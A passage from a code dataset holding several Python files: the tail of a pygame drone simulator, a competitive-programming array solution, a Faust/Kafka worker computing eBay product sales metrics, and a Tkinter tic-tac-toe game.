rotate(self,angle_speed):\r\n self.set_rotation(self.angle+angle_speed)\r\n\r\n def __transformEmulatedToRealCoord(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = 
self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y_factor*y+(self.space_config['y_max'])*self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_transformed= x_factor*x-(self.space_config['x_min'])*self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformRealToEmulatedCoord(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= (y-(self.space_config['y_max'])*self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min']))/y_factor\r\n x_transformed= (x+(self.space_config['x_min'])*self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min']))/x_factor\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformEmulatedToRealVel(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y_factor*y\r\n x_transformed= x_factor*x\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformRealToEmulatedVel(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y/y_factor\r\n x_transformed= x/x_factor\r\n return [x_transformed,y_transformed]\r\n\r\nclass Target:\r\n @dataclass\r\n class Point:\r\n x: float\r\n y: float\r\n\r\n def __init__(self,x_co,y_co):\r\n self.t_point = Target.Point(x_co,y_co)\r\n self.velocity =2.0 #base velocity\r\n self.aceleration = 0.0 #only for muvControl\r\n self.space_config= Drone.space_config\r\n self.instant_vector=[0,0]\r\n self.refresh=self.mruControl\r\n\r\n def getVector(self):\r\n return np.array([self.t_point.x,self.t_point.y]).transpose()\r\n \r\n def setX(self,value):\r\n new_x= value \r\n if new_x <= self.space_config['x_max'] and new_x >= self.space_config['x_min']:\r\n self.t_point.x = new_x\r\n\r\n def setY(self,value):\r\n new_y= value\r\n if new_y <= self.space_config['y_max'] and new_y >= self.space_config['y_min']:\r\n self.t_point.y =new_y\r\n\r\n def translateX(self,value):\r\n new_x= self.t_point.x + value \r\n if new_x <= self.space_config['x_max'] and new_x >= self.space_config['x_min']:\r\n self.t_point.x = new_x\r\n\r\n def translateY(self,value):\r\n new_y= self.t_point.y + value\r\n if new_y <= self.space_config['y_max'] and new_y >= self.space_config['y_min']:\r\n self.t_point.y =new_y\r\n\r\n def setLocal(self,xy_tuple):\r\n self.setX(xy_tuple[0])\r\n self.setY(xy_tuple[1])\r\n\r\n def mruControl(self,instant):\r\n self.translateX(self.velocity*instant[0])\r\n self.translateY(self.velocity*instant[1])\r\n\r\n #TODO\r\n def muvControl(self):\r\n pass\r\n\r\ndef eventKeyHandler(event,o):\r\n ###implementing mru control\r\n \r\n #region for muvControl ignore it for now\r\n sighn=None\r\n logging.debug('Key Handler')\r\n if event.type == pygame.KEYUP:\r\n logging.debug(\"KeyUp Event\")\r\n sighn = -1.0\r\n elif event.type == pygame.KEYDOWN:\r\n logging.debug(\"KeyDown Event\")\r\n sighn = 1.0\r\n #endregion\r\n \r\n if event.key == pygame.K_UP:\r\n logging.debug('UP Key Pressed')\r\n o.refresh((0,1))\r\n 
return\r\n    elif event.key == pygame.K_DOWN:\r\n        logging.debug(\"DOWN Key Pressed\")\r\n        o.refresh((0,-1))\r\n        return\r\n    elif event.key == pygame.K_LEFT:\r\n        logging.debug(\"LEFT Key Pressed\")\r\n        o.refresh((-1,0))\r\n        return\r\n    elif event.key == pygame.K_RIGHT:\r\n        logging.debug(\"RIGHT Key Pressed\")\r\n        o.refresh((1,0))\r\n        return\r\n    \r\n    if event.key == pygame.K_w:\r\n        logging.debug('W Key Pressed')\r\n        o.refresh((0,1))\r\n        return\r\n    elif event.key == pygame.K_s:\r\n        logging.debug(\"S Key Pressed\")\r\n        o.refresh((0,-1))\r\n        return\r\n    elif event.key == pygame.K_a:\r\n        logging.debug(\"A Key Pressed\")\r\n        o.refresh((-1,0))\r\n        return\r\n    elif event.key == pygame.K_d:\r\n        logging.debug(\"D Key Pressed\")\r\n        o.refresh((1,0))\r\n        return\r\n\r\n    \r\n    logging.debug(\"Unknown Key Pressed: \" + str(event.key))\r\n\r\ndef mainFrameHandle(simulator):\r\n    frameconfig={\r\n        'width': 1200,\r\n        'height': 600\r\n    }\r\n    screen = pygame.display.set_mode((frameconfig['width'],frameconfig['height']))\r\n    player = pygame.image.load('drone.png')\r\n    player = pygame.transform.scale(player,(160,80))\r\n    background = pygame.image.load('background.jpg') \r\n    background = pygame.transform.scale(background,(1200,600))\r\n    screen.blit(background, (0, 0))\r\n    o = Drone(player,frameconfig)\r\n    target = simulator.r_\r\n    showing_state = [0,0,0,0]\r\n    while True:\r\n        last_delta_tick = copy.deepcopy(np.minimum(simulator.last_delta_tick,80))\r\n        state_vector = copy.deepcopy(simulator.x)\r\n        screen.blit(background, o.pos, o.pos)\r\n        \r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                exit()\r\n            elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\r\n                eventKeyHandler(event,target)\r\n\r\n\r\n        memory_ocup= len(state_vector[1,:])\r\n        show_row= memory_ocup-2*last_delta_tick\r\n        if testDataQuality(showing_state,state_vector[2,show_row],state_vector[3,show_row],state_vector[6,show_row]):\r\n            o.posByCenter(showing_state[0],showing_state[1])\r\n            o.set_rotation(showing_state[2]*180/np.pi)\r\n        showing_state = [state_vector[2,show_row],state_vector[3,show_row],state_vector[6,show_row],state_vector[8,show_row]] \r\n        screen.blit(o.image, o.pos)\r\n        pygame.display.update()\r\n\r\ndef testDataQuality(showing_state,x,y,rot):\r\n    threshold = 1\r\n    delta_x = showing_state[0]-x\r\n    delta_y = showing_state[1]-y\r\n    delta_rot = showing_state[2]-rot\r\n    norma = math.sqrt(delta_x**2+delta_y**2+delta_rot**2)\r\n    if (norma>threshold) or showing_state[3]!=1:\r\n        logging.debug('norma:' + str(norma))\r\n        return False\r\n    else:\r\n        return True\r\n\r\ndef simulationHandle(simulator):\r\n    while True:\r\n        simulator.nextStep()\r\n\r\ndef main():\r\n    target = Target(0,0)\r\n    simulator = controler.IteractiveSimulator(35,target)\r\n    simulator.fillTimeWindow()\r\n    sim_thread = threading.Thread(target=simulationHandle,args=(simulator,),daemon=True)\r\n    sim_thread.start()\r\n    frame_thread = threading.Thread(target=mainFrameHandle,args=(simulator,))\r\n    frame_thread.start()\r\n    try:\r\n        while True:\r\n            a=input()\r\n            x, y=[float(i) for i in a.split(',')]\r\n            print('target point ({},{})'.format(x, y))\r\n            target.setLocal((x,y))\r\n    finally:\r\n        exit()\r\n\r\n\r\nif __name__ == '__main__':\r\n    logging.basicConfig(encoding='utf-8', level=logging.ERROR)\r\n    main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"313600824","text":"num = int(input())\r\nfor _ in range(num):\r\n    p = 
list(input().strip())\r\n n = int(input())\r\n arr = list(map(int,input().replace(\"[\",\" \").replace(\"]\",\" \").replace(\",\",\" \").split()))\r\n check=0\r\n r=1\r\n for i in p:\r\n if i==\"R\":\r\n r*=-1\r\n else:\r\n if len(arr)==0:\r\n print(\"error\")\r\n check=1\r\n break\r\n else:\r\n if r<0:\r\n del arr[len(arr)-1]\r\n else:\r\n del arr[0]\r\n if check!=1:\r\n if r < 0:\r\n arr.reverse()\r\n print(\"[\", end=\"\")\r\n print(\",\".join(map(str,arr)), end=\"\")\r\n print(\"]\")","sub_path":"powerful104/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10638890","text":"import json\nimport sys\nimport time\nimport faust\nimport asyncio\nfrom decimal import Decimal\nfrom datetime import datetime\n\nsys.path.append('..')\n\nfrom config import *\nfrom util.log import logger\n\nengine = None\n\nimport faust\nfrom typing import List, Dict, Optional, Any\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom config import *\n\n\nclass BaseState:\n\n def show_diff(self, state):\n dct = state.to_representation()\n for k, v in self.to_representation().items():\n if k == '__faust':\n continue\n print(\"{}:\\t{}\\t=>\\t{}\".format(k, v, dct.get(k)))\n\n\nclass ProductTask(faust.Record, serializer='json', coerce=True):\n batch_time: datetime\n site: str\n item_ids: list = []\n category_id: str = ''\n\n\nclass SdkProductTask(faust.Record, serializer='json', coerce=True, include_metadata=False):\n batch_time: datetime\n site: str\n item_id: str\n\n\nclass ProductData(faust.Record, serializer='json', coerce=True):\n timestamp: int = 0\n item_id: str = ''\n site: str = ''\n brand: str = ''\n seller: str = ''\n category_ids: List[str] = []\n leaf_category_ids: List[str] = []\n category_paths: List[str] = []\n category_l1_ids: List[str] = []\n category_l2_ids: List[str] = []\n category_l3_ids: List[str] = []\n price: Decimal = Decimal(0)\n visit: int = 0\n sold: int = 0\n img: str = ''\n title: str = ''\n item_location: str = ''\n item_location_country: str = ''\n store: str = ''\n store_location: str = ''\n marketplace: str = ''\n popular: bool = False\n update_time: datetime = datetime.strptime(\"1970-01-03\", \"%Y-%m-%d\")\n gen_time: Optional[datetime] = None\n data_update_time: Optional[datetime] = None\n\n\nclass ProductState(faust.Record, BaseState, serializer='json', coerce=True):\n # item_id: str = ''\n # date: str = datetime.fromtimestamp(0, TZ_SH).strftime(\"%Y-%m-%d\")\n date: str\n timestamp: int\n batch_num: int\n price: Decimal\n new_last: List[int]\n sold_total_last: List[int]\n sold_last: List[int]\n visit_total_last: List[int]\n visit_last: List[int]\n gmv_last: List[Decimal]\n first_date: Optional[str]\n\n\ndefault_product_state = lambda: ProductState(\n date='',\n timestamp=0,\n batch_num=0,\n price=Decimal(0),\n new_last=[0] * PRODUCT_PERIODS,\n sold_total_last=[0] * PRODUCT_TOTAL_PERIODS,\n sold_last=[0] * PRODUCT_PERIODS,\n visit_total_last=[0] * PRODUCT_TOTAL_PERIODS,\n visit_last=[0] * PRODUCT_PERIODS,\n gmv_last=[Decimal(0)] * PRODUCT_PERIODS\n)\n\n\nclass ProductResult(faust.Record, serializer='json', coerce=True):\n item_id: str\n site: str\n date: str\n brand: str\n seller: str\n category_ids: List[str]\n leaf_category_ids: List[str]\n category_paths: List[str]\n category_l1_ids: List[str]\n category_l2_ids: List[str]\n category_l3_ids: List[str]\n price: Decimal\n visit: int\n sold: int\n img: str\n title: str\n item_location: str\n 
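# NOTE (annotation): the fields from here through update_time are copied straight from ProductData;\n    # the derived rolling-window metrics (sold_*, gmv_*, visit_*, cvr_*, new_*) begin at sold_total below\n    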
item_location_country: str\n store: str\n store_location: str\n marketplace: str\n popular: bool\n update_time: datetime\n sold_total: int\n sold_last_1: int\n sold_last_3: int\n sold_last_7: int\n sold_last_30: int\n pre_sold_last_1: int\n pre_sold_last_3: int\n pre_sold_last_7: int\n sold_last_1_delta: int\n sold_last_3_delta: int\n sold_last_7_delta: int\n sold_last_1_pop: float\n sold_last_3_pop: float\n sold_last_7_pop: float\n sold_2_to_last: int\n sold_3_to_last: int\n sold_4_to_last: int\n sold_5_to_last: int\n sold_6_to_last: int\n sold_7_to_last: int\n gmv_last_1: Decimal\n gmv_last_3: Decimal\n gmv_last_7: Decimal\n gmv_last_30: Decimal\n pre_gmv_last_1: Decimal\n pre_gmv_last_3: Decimal\n pre_gmv_last_7: Decimal\n gmv_last_1_delta: Decimal\n gmv_last_3_delta: Decimal\n gmv_last_7_delta: Decimal\n gmv_last_1_pop: float\n gmv_last_3_pop: float\n gmv_last_7_pop: float\n gmv_2_to_last: Decimal\n gmv_3_to_last: Decimal\n gmv_4_to_last: Decimal\n gmv_5_to_last: Decimal\n gmv_6_to_last: Decimal\n gmv_7_to_last: Decimal\n visit_total: int\n visit_last_1: int\n visit_last_3: int\n visit_last_7: int\n cvr_total: float\n cvr_last_1: float\n cvr_last_3: float\n cvr_last_7: float\n new_last_1: int\n new_last_3: int\n new_last_7: int\n gen_time: Optional[datetime]\n data_update_time: Optional[datetime]\n\n\nimport copy\nimport time\nimport random\nimport functools\nfrom decimal import Decimal\nfrom datetime import datetime, timedelta\nfrom config import *\n\n\nclass BaseCalculator:\n\n def __init__(self):\n self.count = 0\n\n def date_range(self, start, end):\n date = start\n while date <= end:\n yield date\n date = date + timedelta(days=1)\n\n def str_to_datetime(self, date_str):\n return datetime.strptime(date_str, \"%Y-%m-%d\")\n\n def datetime_to_str(self, date):\n return date.strftime(\"%Y-%m-%d\")\n\n def incre(self):\n self.count += 1\n\n def reset_count(self):\n self.count = 0\n\n\nclass ProductCalculator(BaseCalculator):\n\n def __init__(self, state_table):\n self.state_table = state_table\n super().__init__()\n\n def initialize(self, key, product_data):\n self.state_key = key\n self.product_info = self.state_table[key]\n # completion\n original_periods_check = len(self.product_info.sold_last)\n if not self.product_info.first_date:\n self.product_info.first_date = \"\"\n if len(self.product_info.sold_last) != PRODUCT_PERIODS:\n for i in range(PRODUCT_PERIODS-original_periods_check):\n self.product_info.sold_last.insert(0, 0)\n self.product_info.visit_last.insert(0, 0)\n self.product_info.gmv_last.insert(0, Decimal('0.00'))\n original_periods = len(self.product_info.sold_last)\n sold_total_periods = len(self.product_info.sold_total_last)\n visit_total_periods = len(self.product_info.visit_total_last)\n print(\"ori:{},sold_total:{}, visit_total:{}\".format(original_periods, sold_total_periods, visit_total_periods))\n self.product_info.date_ls = [self.product_info.date] * original_periods\n self.product_info.sold_total_last = [0] * (original_periods - sold_total_periods) \\\n + self.product_info.sold_total_last\n self.product_info.visit_total_last = [0] * (original_periods - visit_total_periods) \\\n + self.product_info.visit_total_last\n self.product_info.price_last = [self.product_info.price] * original_periods\n # set date\n self.product_data = product_data\n self.product_data.date = datetime.fromtimestamp(self.product_data.timestamp, TZ_SH) \\\n .strftime(\"%Y-%m-%d\")\n # self.product_data.batch_num = (int(time.time()) + 8 * 3600) // 86400\n self.product_data.batch_num = 
int(self.product_data.update_time.timestamp())\n self.calculate_indexes = set([])\n\n def all_product_data(self, product_data):\n product_data_ls = [product_data]\n if self.product_info.date:\n date_start = self.str_to_datetime(self.product_info.date)\n date_end = self.str_to_datetime(product_data.date)\n price_start = self.product_info.price\n sold_start = self.product_info.sold_total_last[-1]\n visit_start = self.product_info.visit_total_last[-1]\n date_ls = list(self.date_range(date_start, date_end))\n if len(date_ls) > 1:\n price_deltas = self.deltas_generator(price_start, product_data.price,\n len(date_ls) - 1, 'decimal')\n sold_deltas = self.deltas_generator(sold_start, product_data.sold,\n len(date_ls) - 1, 'int')\n visit_deltas = self.deltas_generator(visit_start, product_data.visit,\n len(date_ls) - 1, 'int')\n for i, date in enumerate(date_ls[1:]):\n date_str = self.datetime_to_str(date)\n price_start += price_deltas[i]\n sold_start += sold_deltas[i]\n visit_start += visit_deltas[i]\n if date_str != product_data.date:\n data = ProductData(price=price_start, sold=sold_start,\n visit=visit_start)\n data.date = date_str\n product_data_ls.append(data)\n product_data_ls.sort(key=lambda x: x.date)\n return product_data_ls\n\n def update_state(self, product_data_ls):\n product_data = product_data_ls[-1]\n original_periods = len(self.product_info.sold_last)\n new_start = self.str_to_datetime(product_data.date)\n if self.product_info.date:\n new_start = self.str_to_datetime(self.product_info.date) + timedelta(days=1)\n else:\n self.product_info.sold_total_last[-1] = product_data.sold\n self.product_info.visit_total_last[-1] = product_data.visit\n new_end = self.str_to_datetime(product_data.date)\n for date in self.date_range(new_start, new_end):\n self.product_info.date_ls.append(self.datetime_to_str(date))\n self.product_info.new_last.append(0)\n self.product_info.sold_total_last.append(0)\n self.product_info.visit_total_last.append(0)\n self.product_info.price_last.append(Decimal(0))\n self.product_info.sold_last.append(0)\n self.product_info.visit_last.append(0)\n self.product_info.gmv_last.append(Decimal(0))\n for i in range(original_periods):\n date_str = self.datetime_to_str(new_start + timedelta(days=i - original_periods))\n self.product_info.date_ls[i] = date_str\n date_index_map = {date: i for i, date in enumerate(self.product_info.date_ls)}\n\n product_data_cnt = len(product_data_ls)\n for i, product_data in enumerate(product_data_ls):\n index = date_index_map[product_data.date]\n total_sold_delta = product_data.sold - self.product_info.sold_total_last[index]\n self.product_info.sold_total_last[index] = product_data.sold\n self.product_info.visit_total_last[index] = product_data.visit\n self.product_info.price_last[index] = product_data.price\n cur_sold = product_data.sold - self.product_info.sold_total_last[index - 1]\n print(\"cur_sold:{},product_data_sold:{},sold_total_list:{}\".format(cur_sold, product_data.sold, self.product_info.sold_total_last))\n cur_visit = product_data.visit - self.product_info.visit_total_last[index - 1]\n cur_gmv = product_data.price * cur_sold\n # generate deltas and calculate result only on real data\n if i == product_data_cnt - 1:\n self.calculate_indexes.add(index)\n is_new = True if not self.product_info.date \\\n or self.str_to_datetime(self.product_info.date) + timedelta(days=10) \\\n < self.str_to_datetime(product_data.date) else False\n if is_new:\n self.product_info.new_last[index] = 1\n self.product_info.sold_last[index] = cur_sold\n 
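# NOTE (annotation): sold_last / visit_last / gmv_last hold per-day deltas derived\n            # from the cumulative sold/visit totals, aligned index-for-index with date_ls\n            # (the last entry is the most recent day)\n            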
self.product_info.visit_last[index] = cur_visit\n self.product_info.gmv_last[index] = cur_gmv\n\n def calculate(self, key, product_data):\n self.incre()\n if EFFICIENT_SECOND_LIMIT + product_data.timestamp < time.time():\n print(\"efficient_limit\")\n return\n self.initialize(key, product_data)\n # print(\"--------product data %s\" % self.product_data)\n if self.product_info.batch_num == self.product_data.batch_num:\n print(\"batch_num\")\n return\n if sum(self.product_info.sold_last[-3:]) > 3 \\\n and self.product_data.timestamp + 86400 < time.time():\n yield SdkProductTask(batch_time=self.product_data.update_time,\n site=self.product_data.site,\n item_id=self.product_data.item_id)\n return\n if self.product_info.timestamp > self.product_data.timestamp:\n print(\"stable time:{} > data time\".format(self.product_info.date))\n return\n ori_state = copy.deepcopy(self.product_info)\n if self.product_info.timestamp >= self.product_data.timestamp:\n self.calculate_indexes.add(len(self.product_info.sold_last) - 1)\n else:\n product_data_ls = self.all_product_data(self.product_data)\n self.update_state(product_data_ls)\n # TODO: if state is change or not\n print(\"update stable\")\n print(\"stable sold_last_list:{}\".format(self.product_info.sold_last))\n new_state = ProductState(date=self.product_info.date_ls[-1],\n timestamp=max(self.product_data.timestamp, self.product_info.timestamp),\n batch_num=self.product_data.batch_num,\n price=self.product_info.price_last[-1],\n new_last=self.product_info.new_last[-1 * PRODUCT_PERIODS:],\n sold_total_last=self.product_info.sold_total_last[-1 * PRODUCT_TOTAL_PERIODS:],\n visit_total_last=self.product_info.visit_total_last[-1 * PRODUCT_TOTAL_PERIODS:],\n sold_last=self.product_info.sold_last[-1 * PRODUCT_PERIODS:],\n visit_last=self.product_info.visit_last[-1 * PRODUCT_PERIODS:],\n gmv_last=self.product_info.gmv_last[-1 * PRODUCT_PERIODS:],\n first_date=self.product_info.first_date if self.product_info.first_date else self.product_info.date_ls[-1])\n # print(\"--------new product info\")\n ori_state.show_diff(new_state)\n self.state_table[self.state_key] = new_state\n for result in map(self.convert_to_result, self.calculate_indexes):\n yield result\n\n def calculated_info(self, state, i, day_delta):\n print(\"before calculate stable:{}\".format(self.product_info.sold_last))\n if day_delta < 30:\n ls = list(filter(lambda x:x[1]>0, enumerate(state.sold_last)))\n if ls:\n index = ls[0][0]\n sold = state.sold_last[index]\n gmv = state.gmv_last[index]\n for n in range(min(index, max(len(state.sold_last)-day_delta, 0))):\n state.sold_last[n] = sold\n state.gmv_last[n] = gmv\n print(\"last before calculate stable:{}\".format(self.product_info.sold_last))\n sold_last_30 = sum(state.sold_last[i - 29:i + 1])\n gmv_last_30 = sum(state.gmv_last[i - 29:i + 1])\n pre_sold_last_1, sold_last_1 = state.sold_last[i - 1], state.sold_last[i],\n pre_sold_last_3, sold_last_3 = sum(state.sold_last[i - 3:i]), sum(state.sold_last[i - 2:i + 1])\n pre_sold_last_7, sold_last_7 = sum(state.sold_last[i - 7:i]), sum(state.sold_last[i - 6:i + 1])\n pre_gmv_last_1, gmv_last_1 = state.gmv_last[i - 1], state.gmv_last[i],\n pre_gmv_last_3, gmv_last_3 = sum(state.gmv_last[i - 3:i]), sum(state.gmv_last[i - 2:i + 1])\n pre_gmv_last_7, gmv_last_7 = sum(state.gmv_last[i - 7:i]), sum(state.gmv_last[i - 6:i + 1])\n visit_last_1 = state.visit_last[i]\n visit_last_3 = sum(state.visit_last[i - 2:i + 1])\n visit_last_7 = sum(state.visit_last[i - 6:i + 1])\n new_last_1 = int(any(state.new_last[i:i + 
1]))\n new_last_3 = int(any(state.new_last[i - 2:i + 1]))\n new_last_7 = int(any(state.new_last[i - 6:i + 1]))\n return {\n \"sold_total\": state.sold_total_last[i],\n \"sold_last_1\": sold_last_1,\n \"sold_last_3\": sold_last_3,\n \"sold_last_7\": sold_last_7,\n \"sold_last_30\": sold_last_30,\n \"pre_sold_last_1\": pre_sold_last_1,\n \"pre_sold_last_3\": pre_sold_last_3,\n \"pre_sold_last_7\": pre_sold_last_7,\n \"sold_last_1_delta\": sold_last_1 - pre_sold_last_1,\n \"sold_last_3_delta\": sold_last_3 - pre_sold_last_3,\n \"sold_last_7_delta\": sold_last_7 - pre_sold_last_7,\n \"sold_last_1_pop\": round((sold_last_1 - pre_sold_last_1) / pre_sold_last_1 if pre_sold_last_1 else 0, 6),\n \"sold_last_3_pop\": round((sold_last_3 - pre_sold_last_3) / pre_sold_last_3 if pre_sold_last_3 else 0, 6),\n \"sold_last_7_pop\": round((sold_last_7 - pre_sold_last_7) / pre_sold_last_7 if pre_sold_last_7 else 0, 6),\n \"sold_2_to_last\": state.sold_last[i - 1],\n \"sold_3_to_last\": state.sold_last[i - 2],\n \"sold_4_to_last\": state.sold_last[i - 3],\n \"sold_5_to_last\": state.sold_last[i - 4],\n \"sold_6_to_last\": state.sold_last[i - 5],\n \"sold_7_to_last\": state.sold_last[i - 6],\n \"gmv_last_1\": gmv_last_1,\n \"gmv_last_3\": gmv_last_3,\n \"gmv_last_7\": gmv_last_7,\n \"gmv_last_30\": gmv_last_30,\n \"pre_gmv_last_1\": pre_gmv_last_1,\n \"pre_gmv_last_3\": pre_gmv_last_3,\n \"pre_gmv_last_7\": pre_gmv_last_7,\n \"gmv_last_1_delta\": gmv_last_1 - pre_gmv_last_1,\n \"gmv_last_3_delta\": gmv_last_3 - pre_gmv_last_3,\n \"gmv_last_7_delta\": gmv_last_7 - pre_gmv_last_7,\n \"gmv_last_1_pop\": round(float((gmv_last_1 - pre_gmv_last_1) / pre_gmv_last_1 if pre_gmv_last_1 else 0), 6),\n \"gmv_last_3_pop\": round(float((gmv_last_3 - pre_gmv_last_3) / pre_gmv_last_3 if pre_gmv_last_3 else 0), 6),\n \"gmv_last_7_pop\": round(float((gmv_last_7 - pre_gmv_last_7) / pre_gmv_last_7 if pre_gmv_last_7 else 0), 6),\n \"gmv_2_to_last\": state.gmv_last[i - 1],\n \"gmv_3_to_last\": state.gmv_last[i - 2],\n \"gmv_4_to_last\": state.gmv_last[i - 3],\n \"gmv_5_to_last\": state.gmv_last[i - 4],\n \"gmv_6_to_last\": state.gmv_last[i - 5],\n \"gmv_7_to_last\": state.gmv_last[i - 6],\n \"visit_total\": state.visit_total_last[i],\n \"visit_last_1\": visit_last_1,\n \"visit_last_3\": visit_last_3,\n \"visit_last_7\": visit_last_7,\n \"cvr_total\": round(state.sold_total_last[i] / state.visit_total_last[i] if state.visit_total_last[i] else 0,\n 6),\n \"cvr_last_1\": round(sold_last_1 / visit_last_1 if visit_last_1 else 0, 6),\n \"cvr_last_3\": round(sold_last_3 / visit_last_3 if visit_last_3 else 0, 6),\n \"cvr_last_7\": round(sold_last_7 / visit_last_7 if visit_last_7 else 0, 6),\n \"new_last_1\": new_last_1,\n \"new_last_3\": new_last_3,\n \"new_last_7\": new_last_7\n }\n\n def convert_to_result(self, i):\n date = self.product_info.date_ls[i]\n day_delta = 0\n if self.product_info.first_date:\n td = datetime.strptime(date, \"%Y-%m-%d\") - datetime.strptime(self.product_info.first_date, \"%Y-%m-%d\")\n day_delta = td.days\n info = self.calculated_info(self.product_info, i, day_delta)\n return ProductResult(\n item_id=self.product_data.item_id, site=self.product_data.site, date=date,\n brand=self.product_data.brand,\n seller=self.product_data.seller,\n category_ids=self.product_data.category_ids,\n leaf_category_ids=self.product_data.leaf_category_ids,\n category_paths=self.product_data.category_paths,\n category_l1_ids=self.product_data.category_l1_ids,\n category_l2_ids=self.product_data.category_l2_ids,\n 
category_l3_ids=self.product_data.category_l3_ids,\n price=self.product_info.price_last[i],\n visit=self.product_data.visit,\n sold=self.product_data.sold,\n img=self.product_data.img,\n title=self.product_data.title,\n item_location=self.product_data.item_location,\n item_location_country=self.product_data.item_location_country,\n store=self.product_data.store,\n store_location=self.product_data.store_location,\n marketplace=self.product_data.marketplace,\n popular=self.product_data.popular,\n update_time=self.product_data.update_time,\n gen_time=self.product_data.gen_time,\n data_update_time=self.product_data.data_update_time,\n **info)\n\n def deltas_generator(self, start, end, period_num, delta_type='int'):\n total_delta = end - start\n if delta_type == 'decimal':\n assert isinstance(total_delta, Decimal)\n delta = round(total_delta / period_num, 2)\n deltas = [delta] * (period_num - 1)\n deltas.append(total_delta - sum(deltas))\n return deltas\n elif delta_type == 'int':\n assert isinstance(total_delta, int)\n deltas = [total_delta // period_num] * period_num\n for i in random.sample(range(len(deltas)), total_delta % period_num):\n deltas[i] += 1\n return deltas\n\n\napp = faust.App('ebay-product-calculate', broker=\"kafka://47.112.96.218:9092\", store='rocksdb://',\n topic_replication_factor=1,\n topic_partitions=1)\n'''\n@app.on_configured.connect\ndef configure(app, conf, **kwargs):\n conf.topic_replication_factor = TOPIC_REPLICATION\n conf.topic_partitions = TOPIC_PARTITION\n'''\n\nproduct_data_topic = app.topic('ebay-product-data1', key_type=str,\n value_type=ProductData)\nproduct_info_table = app.Table('ebay-product-infos14',\n default=default_product_state,\n key_type=str, value_type=ProductState\n )\nproduct_result_topic = app.topic('ebay-product-result', value_type=ProductResult)\n\n\n@app.agent(product_data_topic, concurrency=1)\nasync def product_calculate(stream):\n calculator = ProductCalculator(product_info_table)\n start_time = time.time()\n async for key, product_data in stream.items():\n for product_result in calculator.calculate(key, product_data):\n print(product_result)\n print(product_info_table['uk263548829995'])\n # if isinstance(product_result, ProductResult):\n # await product_result_topic.send(value=product_result)\n # else:\n # await sdk_task_topic.pub(product_result.dumps())\n now_time = time.time()\n if start_time + 10 < now_time:\n print(\"speed: {}\".format(calculator.count / (now_time - start_time)))\n calculator.reset_count()\n start_time = now_time\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n app.main()\n","sub_path":"kafka_faust_english_nlp/product_calculate_worker.py","file_name":"product_calculate_worker.py","file_ext":"py","file_size_in_byte":23085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217616814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 23 21:21:18 2016\n\n@author: BRUNO IAMPOLSKY\n\"\"\"\nimport tkinter as tk\nimport random\n\nclass Tabuleiro:\n \n def __init__(self, geral):\n \n self.frame = tk.Frame(geral)\n self.frame.pack(fill=\"both\")\n\n self.canvas = tk.Canvas(self.frame, width=600, height=600)\n self.canvas.pack(fill=\"both\")\n self.frame= tk.Frame(self.frame)\n self.frame.pack(fill=\"both\")\n \n self.Start= tk.Button(self.frame, text='Press this Red Button to Play!', height=4, command=self.jogada, bg='red', fg='white')\n self.Start.pack(fill=\"both\")\n nome = \"X\"\n self.label= tk.Label(self.frame, text=\"Next is: %s\"%nome, 
height=4, bg='black', fg='blue')\n self.label.pack(fill=\"both\") \n \n self._tabuleiro()\n \n def _tabuleiro(self):\n \n self.canvas.create_rectangle(0,0,600,600, outline=\"black\")\n \n self.canvas.create_rectangle(200,600,400,0, outline=\"black\")\n \n self.canvas.create_rectangle(0,200,600,400, outline=\"black\")\n \n \n def jogada(self):\n self.canvas.delete(tk.ALL)\n self.canvas.bind(\"\", self.pecas) \n self._tabuleiro()\n \n self.matriz=[[0,0,0],[0,0,0],[0,0,0]]\n self.preenchido=0\n \n def pecas(self,peca):\n for a in range(0,600,200):\n \n for b in range(0,600,200):\n \n if (peca.x in range(a,a +200)) and (peca.y in range(b,b +200)):\n if self.canvas.find_enclosed(a,b,a+200,b+200)==():\n \n X=(2*a+200)/2\n Y=(2*b+200)/2\n linha=int(a/200)\n coluna=int(b/200)\n cores = random.choice([\"black\", \"blue\", \"red\", \"lightblue\", \"purple\", \"grey\"])\n \n if self.preenchido % 2 == 0:\n \n self.canvas.create_line( X+40, Y+40, X-40, Y-40, width=12, fill=\"black\")\n self.canvas.create_line( X-40, Y+40, X+40, Y-40, width=12, fill=\"black\")\n self.matriz[coluna][linha]+=9\n \n self.label['text']=(\"Next is: O\")\n \n self.preenchido+=1\n \n else:\n self.canvas.create_oval( X+50, Y+50, X-50, Y-50, width=12, outline= cores)\n self.matriz[coluna][linha]+=1\n \n self.label['text']=(\"Next is: X\")\n \n self.preenchido+=1\n \n \n \n \n\nroot= tk.Tk()\napp=Tabuleiro(root)\nroot.mainloop()\n\n \n 